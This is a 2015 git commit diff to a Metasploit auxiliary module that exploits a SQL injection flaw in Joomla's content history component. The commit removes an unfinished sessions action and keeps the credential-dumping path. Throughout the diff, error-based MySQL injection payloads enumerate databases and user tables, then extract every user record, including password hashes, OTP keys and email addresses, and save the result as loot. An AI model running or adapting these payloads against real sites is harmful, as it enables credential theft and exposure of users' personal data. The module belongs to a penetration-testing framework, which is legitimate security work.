Update joomla_contenthistory_sqli.rb

Remove sessions for now
2015-10-23 09:32:15 -05:00 · 2015-10-23 09:32:15 -05:00 · 07d549d783
parent e4281dd1fb
commit 07d549d783
1 changed files with 56 additions and 61 deletions
--- a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb
+++ b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb
@ -58,69 +58,64 @@ class Metasploit4 < Msf::Auxiliary
    left_marker = Rex::Text.rand_text_alpha(5)
    right_marker = Rex::Text.rand_text_alpha(5)

-    if datastore['ACTION'] == 'HASHES'
-      db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-      res = sqli(db_count)
-      db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+    db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+    res = sqli(db_count)
+    db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/

-      dbs = []
-      0.upto(db_count-1) do |i|
-        db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-
-        res = sqli(db)
-        dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-      end
-
-      dbs.delete('performance_schema')
-      dbs.delete('information_schema')
-      dbs.delete('mysql')
-
-      users = []
-      dbs.each do |db|
-
-        tables = []
-        table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-        res = sqli(table_count)
-        table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-
-        0.upto(table_count-1) do |i|
-          table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-          res = sqli(table)
-          table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-          tables << table if table =~ /_users$/
-        end
-
-        tables.each do |table|
-
-          user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-          res = sqli(user_count)
-          user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-          cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
-
-          0.upto(user_count-1) do |i|
-            user = {}
-            cols.each do |col|
-              k = 1
-              val = nil
-              user[col] = ''
-              while val != ''
-                get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
-                res = sqli(get_col)
-                val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
-                user[col] << val
-                k = k + 54
-              end
-            end
-            users << user
-          end
-        end
-      end
-      p users.to_json
-    elsif datastore['ACTION'] == 'SESSIONS'
-
-    else
-      fail_with(Failure::Unknown, "The ACTION " + datastore['ACTION'] + " is not supported.")
+    dbs = []
+    0.upto(db_count-1) do |i|
+      db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+      res = sqli(db)
+      dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
    end
+
+    dbs.delete('performance_schema')
+    dbs.delete('information_schema')
+    dbs.delete('mysql')
+
+    users = []
+    dbs.each do |db|
+      vprint_status("Found database: " + db)
+      tables = []
+      table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+      res = sqli(table_count)
+      table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+
+      0.upto(table_count-1) do |i|
+        table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+        res = sqli(table)
+        table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+        tables << table if table =~ /_users$/
+      end
+
+      tables.each do |table|
+        vprint_status("Found table: " + table)
+        user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+        res = sqli(user_count)
+        user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+        cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
+
+        0.upto(user_count-1) do |i|
+          user = {}
+          cols.each do |col|
+            k = 1
+            val = nil
+            user[col] = ''
+            while val != ''
+              get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+              res = sqli(get_col)
+              val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
+              user[col] << val
+              k = k + 54
+            end
+          end
+          users << user
+        end
+      end
+    end
+
+    path = store_loot('joomla.file', 'text/plain', datastore['RHOST'], users.to_json, 'joomla.users')
+    print_good("Users saved to file: " + path)
  end

  def sqli(payload)